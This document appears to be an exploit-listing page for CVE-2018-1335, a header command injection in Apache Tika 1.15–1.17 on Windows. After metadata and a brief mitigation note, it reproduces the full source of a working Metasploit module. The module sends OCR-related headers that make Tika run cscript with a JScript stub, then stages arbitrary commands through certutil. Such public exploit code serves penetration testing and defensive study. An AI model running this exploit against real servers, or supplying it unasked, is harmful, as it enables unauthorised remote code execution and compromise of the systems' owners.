header-logo
Suggest Exploit
vendor:
Tika
by:
h00die, David Yesland, Tim Allison
8.1
CVSS
HIGH
Command Injection
78
CWE
Product Name: Tika
Affected Version From: 1.15
Affected Version To: 1.17
Patch Exists: YES
Related CWE: CVE-2018-1335
CPE: a:apache:tika
Metasploit:
Other Scripts:
Tags: packetstorm,edb,cve,cve2018,apache,tika,rce,intrusive
CVSS Metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/https://www.exploit-db.com/exploits/47208https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@dev.tika.apache.orghttps://nvd.nist.gov/vuln/detail/CVE-2018-1335http://packetstormsecurity.com/files/153864/Apache-Tika-1.17-Header-Command-Injection.html
Nuclei Metadata: {'max-request': 1, 'vendor': 'apache', 'product': 'tika'}
Platforms Tested: Windows
2018

Apache Tika Header Command Injection

This module exploits a command injection vulnerability in Apache Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is used to bypass magic bytes checking. When OCR is specified in the request, parameters can be passed to change the parameters passed at command line to allow for arbitrary JScript to execute. A JScript stub is passed to execute arbitrary code. This module was verified against version 1.15 - 1.17 on Windows 2012. While the CVE and finding show more versions vulnerable, during testing it was determined only > 1.14 was exploitable due to jp2 support being added.

Mitigation:

Update to a version of Apache Tika that is not vulnerable to command injection.
Source

Exploit-DB raw data:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Tika Header Command Injection',
      'Description'    => %q{
          This module exploits a command injection vulnerability in Apache
        Tika 1.15 - 1.17 on Windows.  A file with the image/jp2 content-type is
        used to bypass magic bytes checking.  When OCR is specified in the
        request, parameters can be passed to change the parameters passed
        at command line to allow for arbitrary JScript to execute. A
        JScript stub is passed to execute arbitrary code. This module was
        verified against version 1.15 - 1.17 on Windows 2012.
        While the CVE and finding show more versions vulnerable, during
        testing it was determined only > 1.14 was exploitable due to
        jp2 support being added.
      },
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows',
            {'Arch' => [ARCH_X86, ARCH_X64],
            'Platform' => 'win',
            'CmdStagerFlavor' => ['certutil']
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 25 2018',
      'Author' =>
        [
          'h00die', # msf module
          'David Yesland', # edb submission
          'Tim Allison' # discovery
        ],
      'References' =>
        [
          ['EDB', '46540'],
          ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
          ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
          ['CVE', '2018-1335']
        ]))

    register_options(
      [
        Opt::RPORT(9998),
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [true, 'Override check result', false])
      ])
  end

  def check
    res = send_request_cgi({
             'uri'    => normalize_uri(target_uri),
           })
    if res.nil?
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    elsif res.code != 200
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    end

    if res.body =~ /Apache Tika (\d.[\d]+)/
      version = Gem::Version.new($1)
      vprint_status("Apache Tika Version Detected: #{version}")
      if version.between?(Gem::Version.new('1.15'), Gem::Version.new('1.17'))
        return CheckCode::Vulnerable
      end
    end
    CheckCode::Safe
  end

  def execute_command(cmd, opts = {})
    cmd.gsub(/"/, '\"')
    jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
    jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"

    print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
    res = send_request_cgi({
             'method' => 'PUT',
             'uri'    => normalize_uri(target_uri, 'meta'),
             'headers' => {
                "X-Tika-OCRTesseractPath" => '"cscript"',
                "X-Tika-OCRLanguage"      => "//E:Jscript",
                "Expect"                  => "100-continue",
                "Content-type"            => "image/jp2",
                "Connection"              => "close"},
             'data' => jscript
           })

    fail_with(Failure::Disconnected, 'No server response') unless res
    unless (res.code == 200 && res.body.include?('tika'))
      fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
    end
  end

  def exploit
    checkcode = check
    unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
      print_error("#{checkcode[1]}. Set ForceExploit to override.")
      return
    end

    execute_cmdstager(linemax: 8000)
  end
end

Navigation

Suggest Exploit

Services By CQR